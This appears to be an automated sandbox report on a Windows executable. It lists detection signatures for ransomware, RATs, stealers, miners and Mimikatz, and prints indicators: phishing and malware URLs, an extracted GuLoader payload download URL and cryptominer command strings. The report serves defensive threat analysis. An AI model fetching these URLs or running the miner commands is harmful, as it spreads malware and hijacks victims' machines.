Windows Analysis Report 1gPmnCR2PX.exe

Overview

General Information

Sample Name: 1gPmnCR2PX.exe
Analysis ID: 1603
MD5: 5ffe281957d81c218b5851ea276ed82b
SHA1: 0fce1d74469b880820c8e6b2d52e4e0a206ee795
SHA256: ae4d46e3c772093c5ad9ee27e412f11e6be6923a1efeca80b1dba5d1fef8f62e

Detection

RemCom RemoteAdmin Mimikatz GuLoader AESCRYPT Ransomware AveMaria Babuk BitCoin Miner
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected PasteDownloader
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Detected Hacktool Mimikatz
Yara detected Discord Token Stealer
Yara detected BlackMoon Ransomware
Yara detected Parallax RAT
Yara detected Ragnarok ransomware
Yara detected Wannacry ransomware
Yara detected MegaCortex Ransomware
Yara detected Valak
Yara detected AntiVM3
Yara detected Babuk Ransomware
Yara detected Nemty Ransomware
Yara detected Mini RAT
Yara detected Snatch Ransomware
Antivirus detection for URL or domain
Yara detected AESCRYPT Ransomware
Yara detected RansomwareGeneric
Yara detected Coinhive miner
GuLoader behavior detected
Yara detected Gocoder ransomware
Yara detected BitCoin Miner
Yara detected WannaRen ransomware
Yara detected GuLoader
Yara detected Hancitor
Found malware configuration
Yara detected Conti ransomware
Yara detected Generic Dropper
Yara detected Phorpiex smb component
Yara detected Clop Ransomware
Multi AV Scanner detection for submitted file
Yara detected Ryuk ransomware
Yara detected Xmrig cryptocurrency miner
Malicious sample detected (through community Yara rule)
Yara detected Cerber ransomware
Yara detected Rhino ransomware
Yara detected Voidcrypt Ransomware
Yara detected Njrat
Yara detected GoGoogle ransomware
Yara detected UACMe UAC Bypass tool
Yara detected Delta Ransomware
Yara detected Predator
Yara detected Mimikatz
Yara detected AveMaria stealer
Yara detected Cryptolocker ransomware
Multi AV Scanner detection for domain / URL
Yara detected Codoso Ghost
Yara detected Growtopia
Yara detected RevengeRAT
Contains VNC / remote desktop functionality (version string found)
Found strings related to Crypto-Mining
Tries to detect Any.run
Found Tor onion address
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Sample is not signed and drops a device driver
May modify the system service descriptor table (often done to hook functions)
Yara detected AllatoriJARObfuscator
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to steal Mail credentials (via file access)
Uses dynamic DNS services
Tries to harvest and steal browser information (history, passwords, etc)
Hides threads from debuggers
Found string related to ransomware
Yara detected MSILLoadEncryptedAssembly
Yara detected VB6 Downloader Generic
Contains functionality to hide user accounts
May drop file containing decryption instructions (likely related to ransomware)
Binary or sample is protected by dotNetProtector
C2 URLs / IPs found in malware configuration
May enable test signing (to load unsigned drivers)
Deletes shadow drive data (may be related to ransomware)
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Abnormal high CPU Usage
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Creates driver files
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Yara detected Keylogger Generic
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Contains functionality to query the security center for anti-virus and firewall products
Creates files inside the system directory
May infect USB drives
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Yara detected RemCom RemoteAdmin tool
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Contains strings related to BOT control commands
Contains functionality to detect virtual machines (SLDT)
Enables security privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Yara detected Winexe tool

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://outfish.bounceme.net/outl.dot Avira URL Cloud: Label: phishing
Source: http://kec-rupit.muratarakab.go.id/si/excelz/index.php?email= Avira URL Cloud: Label: phishing
Source: http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.doc Avira URL Cloud: Label: malware
Source: http://costacars.es/ico/ortodox.php Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000006.00000002.18689801595.00000000022B0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "http://sopage.duckdns.org/Solex-RacoonStealer_JCgunCl163.bin"}
Multi AV Scanner detection for submitted file
Source: 1gPmnCR2PX.exe Virustotal: Detection: 22%
Source: 1gPmnCR2PX.exe ReversingLabs: Detection: 17%
Yara detected Njrat
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Predator
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected AveMaria stealer
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Multi AV Scanner detection for domain / URL
Source: sopage.duckdns.org Virustotal: Detection: 5%
Source: http://www.bonusesfound.ml/update/index.php Virustotal: Detection: 13%
Yara detected RevengeRAT
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Antivirus or Machine Learning detection for unpacked file
Source: 11.3.MpSigStub.exe.21b5f5daeae.24.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.3.MpSigStub.exe.21b5f5daeae.14.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.3.MpSigStub.exe.21b5e0c7264.168.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.3.MpSigStub.exe.21b5e0c7264.74.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.3.MpSigStub.exe.21b5e0c67ca.73.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.3.MpSigStub.exe.21b5e11334e.136.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.3.MpSigStub.exe.21b5f670ae6.50.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.MpSigStub.exe.21b5e4bcb15.155.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.3.MpSigStub.exe.21b5e0c6d17.166.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.3.MpSigStub.exe.21b5e4bf197.154.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.3.MpSigStub.exe.21b5e0c6d17.72.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.3.MpSigStub.exe.21b5e0c67ca.167.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Location Tracking:

Yara detected Hancitor
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30AC1C4 CreateDirectoryW,FreeLibrary,DecryptFileW,FreeLibrary,FreeLibrary, 18_2_00007FF7E30AC1C4

Exploits:

Yara detected UACMe UAC Bypass tool
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f293752.82.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR

Privilege Escalation:

Detected Hacktool Mimikatz
Source: MpSigStub.exe, 0000000B.00000003.18300229223.0000021B5E691000.00000004.00000001.sdmp String found in binary or memory: blog.gentilkiwi.com/mimikatz

Phishing:

Yara detected Phorpiex smb component
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR

Bitcoin Miner:

Yara detected Coinhive miner
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected BitCoin Miner
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Xmrig cryptocurrency miner
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Found strings related to Crypto-Mining
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: stratum+tcp://
Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp String found in binary or memory: nohup/tmp/bashg-c/tmp/pools.txt>/dev/null2>&1&
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: href="https://platform.jsecoin.com/?lander=1&utm_source=referral&utm_campaign=aff'
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: cryptonight
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: xmrminer
Source: MpSigStub.exe, 0000000B.00000003.18270729059.0000021B5F68E000.00000004.00000001.sdmp String found in binary or memory: URL of mining server
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: XMR-Stak-CPU mining software, CPU Version.
Source: MpSigStub.exe, 0000000B.00000003.18321595376.0000021B5F0A0000.00000004.00000001.sdmp String found in binary or memory: \nscpucnminer\img001.exe
Source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp String found in binary or memory: grep"mine.moneropool.com"|awk'{print$2}'|xargskill-9psauxf|grep-vgrep|grep"xmr.crypto-pool.fr:8080
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: CNMiner
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp String found in binary or memory: -o pool.minexmr.com:4444 -u
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: XMRig 2.15.1-beta

Compliance:

Uses 32bit PE files
Source: 1gPmnCR2PX.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: HookPasswordReset.pdb source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp
Source: Binary string: padcryptUninstaller\obj\Debug\padcryptUninstaller.pdb source: MpSigStub.exe, 0000000B.00000003.18267435419.0000021B5E8B8000.00000004.00000001.sdmp
Source: Binary string: PassView.pdb source: MpSigStub.exe, 0000000B.00000003.18283976563.0000021B5F1A8000.00000004.00000001.sdmp
Source: Binary string: e:\mpengine\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\System.Xml\System.Xml.pdb source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp
Source: Binary string: ConfigSecurityPolicy.pdb source: mpam-728dfe11.exe, 00000011.00000003.18590234890.0000027770036000.00000004.00000001.sdmp
Source: Binary string: tdc.pdb3 source: MpSigStub.exe, 0000000B.00000003.18276333779.0000021B5E715000.00000004.00000001.sdmp
Source: Binary string: msoert2.pdb source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp
Source: Binary string: Tokenvator.pdb source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: I \\WOO\\HT\\AD_Attacker\\.+\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: D:\DevPatch\_FINAL\Bin\MapleStory.pdbx source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\finger\objfre\i386\finger.pdb source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp
Source: Binary string: \iSafe\trunk\bin\iSafeSvc2.pdb source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: dfsfgjfgdes.pdb source: MpSigStub.exe, 0000000B.00000003.18296740257.0000021B5DF46000.00000004.00000001.sdmp
Source: Binary string: nanamnana\obj\Debug\nanamnana.pdbx source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp
Source: Binary string: L6\\spam\\export_email_outlook\\cpp\\.*\\export..x\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: \Akl\kh\Release\kh.pdb source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp
Source: Binary string: \Release\initialexe\torch.exe.pdb source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp
Source: Binary string: dsquery.pdb source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\ebclient\dmsetup\dmsched2\Release\dmsched2.pdbx source: MpSigStub.exe, 0000000B.00000003.18287502945.0000021B5FA2A000.00000004.00000001.sdmp
Source: Binary string: -\BetterInstaller\Release\BetterInstaller.pdb source: MpSigStub.exe, 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp
Source: Binary string: \\spam\\export_email_outlook\\cpp\\.*\\export..x\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: dxva2.pdb3 source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp
Source: Binary string: D:\code\ccminer\Release\x64\ccminer.pdb source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp
Source: Binary string: subst.pdb source: MpSigStub.exe, 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp
Source: Binary string: \BaseFlash.pdb source: MpSigStub.exe, 0000000B.00000003.18322603018.0000021B5FB74000.00000004.00000001.sdmp
Source: Binary string: schtasks.pdbd source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp
Source: Binary string: \Release\SSEngine.pdb source: MpSigStub.exe, 0000000B.00000003.18282591502.0000021B5FCD4000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86chk\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\lodctr\objchk\i386\lodctr.pdb source: MpSigStub.exe, 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp
Source: Binary string: Archer_Add_Packet\Release\Packet.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: \tcrypt\Release\s_low.pdbx source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp
Source: Binary string: P'Deamon-dll.*\\Release\\Deamon-dll\.pdb source: MpSigStub.exe, 0000000B.00000003.18286078322.0000021B5EE90000.00000004.00000001.sdmp
Source: Binary string: M(\\qbot_debugger\\.+\\qbot_debugger\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: KSLD.pdbGCTL source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp
Source: Binary string: freefilesync_x64.pdb source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp
Source: Binary string: P)E:\\Production\\Tool-Developing\\.+\.pdb source: MpSigStub.exe, 0000000B.00000003.18286078322.0000021B5EE90000.00000004.00000001.sdmp
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: MpSigStub.exe, 0000000B.00000003.18270729059.0000021B5F68E000.00000004.00000001.sdmp
Source: Binary string: d:\74\55\Child\Require\bank\Bear\rather\66\Boy\front\special\straight\wood\1\guide.pdb source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp
Source: Binary string: KSLD.pdb source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp
Source: Binary string: cryptdll.pdb source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp
Source: Binary string: reg.pdbd source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp
Source: Binary string: !#HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: pid.pdb3 source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: @.pdb source: MpSigStub.exe, 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp
Source: Binary string: \b\Ship\Win32\VideoProjectsLauncher\VideoProjectsLauncher.pdb source: MpSigStub.exe, 0000000B.00000003.18301997089.0000021B5FD17000.00000004.00000001.sdmp
Source: Binary string: HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp
Source: Binary string: vssadmin.pdb source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp
Source: Binary string: r:\rel\iMS-srvreg56.pdb source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp
Source: Binary string: 50G:\\combustion\\aiding\\breaching\\stooping.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: msnetobj.pdb3 source: MpSigStub.exe, 0000000B.00000003.18306579283.0000021B5E6D2000.00000004.00000001.sdmp
Source: Binary string: lsasrv.pdb source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp
Source: Binary string: llq001\src\out\Official\UpdateChecker.exe.pdb source: MpSigStub.exe, 0000000B.00000003.18304834904.0000021B5E504000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-comm-l1-1-0.pdb source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp
Source: Binary string: fA\\win\\build\\src\\build\\Release\\chrome_frame_helper\.exe\.pdb source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: C:\Proyectos\desktop_apps\Updater\UpdaterVittalia\obj\Release\UpdaterService.pdb source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: K8MiniPage.pdb source: MpSigStub.exe, 0000000B.00000003.18296740257.0000021B5DF46000.00000004.00000001.sdmp
Source: Binary string: PELoader.pdb source: MpSigStub.exe, 0000000B.00000003.18292104164.0000021B5EFDB000.00000004.00000001.sdmp
Source: Binary string: Session.*\\Release\\GenIt\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: \Release\ProtectedService.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: msvfw32.pdb` source: MpSigStub.exe, 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp
Source: Binary string: [cC]:\\Project(s)?\\ATLResDLL\\release\\AtlResDllR(es)?\.pdb source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: \release\LSASecretsView.pdbx source: MpSigStub.exe, 0000000B.00000003.18283976563.0000021B5F1A8000.00000004.00000001.sdmp
Source: Binary string: SelfMother\SeaFriend\SmallStore\save.pdb source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp
Source: Binary string: #CNC Plugins Tools\ProgFactory_d.pdb source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp
Source: Binary string: *.pdb.|!\VstsGitSourceIndex.exe source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp
Source: Binary string: BrowserManager.pdbxx source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: 'D:\code\ccminer\Release\x64\ccminer.pdb source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp
Source: Binary string: msvfw32.pdb source: MpSigStub.exe, 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp
Source: Binary string: hal.pdb source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp
Source: Binary string: \mspass.pdb source: MpSigStub.exe, 0000000B.00000003.18299061122.0000021B5F89F000.00000004.00000001.sdmp
Source: Binary string: \bin\pxdl.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: flzEnlAs.pdb source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp
Source: Binary string: D:\WorkObject\SupL_EnableBHO\BHOEnabler\bin\BHOEnabler.pdb source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp
Source: Binary string: WirelessKeyView.pdb source: MpSigStub.exe, 0000000B.00000003.18287502945.0000021B5FA2A000.00000004.00000001.sdmp
Source: Binary string: i=[cC]:\\Project(s)?\\ATLResDLL\\release\\AtlResDllR(es)?\.pdb source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: \SSFK\Release\SSFK.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: $\SuperLight\release\MfcDllServer.pdb source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp
Source: Binary string: Release\adviser.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: JJDownLoader\Bin\JJDownLoader_a.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: iashlpr.pdb source: MpSigStub.exe, 0000000B.00000003.18316500668.0000021B5EA6E000.00000004.00000001.sdmp
Source: Binary string: \tutorial\Release\CoffeeShop6.pdb source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp
Source: Binary string: .C:\source\src\nssm\out\Release\win64\absrv.pdb source: MpSigStub.exe, 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp
Source: Binary string: \\fishmaster\\x64\\Release\\fishmaster\.pdb source: MpSigStub.exe, 0000000B.00000003.18286937753.0000021B5E799000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp
Source: Binary string: ZAService.pdb source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp
Source: Binary string: gMolq.pdb source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp
Source: Binary string: O&\\wininet_fr_20200212\\.+\\?dlln\.pdb source: MpSigStub.exe, 0000000B.00000003.18286078322.0000021B5EE90000.00000004.00000001.sdmp
Source: Binary string: rafotech\minisoft\tools\xyfa\Release\xyfa.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: RamMap.pdb source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp
Source: Binary string: C:\src\similar\clients\our\new_bundler\nsis_plugins\plugins\safed.pdbxm source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp
Source: Binary string: c:\\Injekt - Builds\\.*\\SpeedBrowserP\\Source\\shortcut\\Encoder\\obj\\Release\\shortcut.pdb source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: aeroadmin.pdb source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp
Source: Binary string: 6E:\Other\SecEdit\Sedisk\objfre_w2K_x86\i386\Sedisk.pdb~ source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: rpcss.pdb source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp
Source: Binary string: \Release\UpdaterService.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: RegCleaner\bin\Release\PCCleaningUtility.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: You\Above\Particular\Exception.pdb source: MpSigStub.exe, 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp
Source: Binary string: \down\Wing\Would.pdb source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp
Source: Binary string: mafia2injector\Release\MafiaInjector.pdb source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp
Source: Binary string: \\aes_mfc\\Release\\aes_mfc.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: Release\haozip.chs\bin\Win32\release\pdb\HaoZip7zSetup.pdb source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp
Source: Binary string: \Release\TKCodeDDoS.pdb source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp
Source: Binary string: CrossLoopService.pdb source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp
Source: Binary string: \Release\winsrcsrv.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: MpAdlElvtStub.pdb source: mpam-728dfe11.exe, 00000011.00000002.19890272832.00007FF74001F000.00000002.00020000.sdmp
Source: Binary string: ir41_qcx.pdb source: MpSigStub.exe, 0000000B.00000003.18316500668.0000021B5EA6E000.00000004.00000001.sdmp
Source: Binary string: G\SharedSerialization\obj\Release\netstandard2.0\SharedSerialization.pdb source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp
Source: Binary string: dbmsrpcn.pdb source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp
Source: Binary string: Deamon-dll.*\\Release\\Deamon-dll\.pdb source: MpSigStub.exe, 0000000B.00000003.18286078322.0000021B5EE90000.00000004.00000001.sdmp
Source: Binary string: termsrv.pdbaA source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp
Source: Binary string: mciole32.pdb source: MpSigStub.exe, 0000000B.00000003.18304567311.0000021B5E4C2000.00000004.00000001.sdmp
Source: Binary string: irprops.pdbj source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp
Source: Binary string: \Release\NvBackend.pdbx source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp
Source: Binary string: mqutil.pdb source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: ConfigSecurityPolicy.pdbGCTL source: mpam-728dfe11.exe, 00000011.00000003.18590234890.0000027770036000.00000004.00000001.sdmp
Source: Binary string: ReleaseDebug\TvServer.pdb source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp
Source: Binary string: usp10.pdbj source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp
Source: Binary string: mstscax.pdb source: MpSigStub.exe, 0000000B.00000003.18277664161.0000021B5E0C2000.00000004.00000001.sdmp
Source: Binary string: \output\MinSizeRel\updrem.pdb source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp
Source: Binary string: \Disable_Windowsupdate.pdbaG source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp
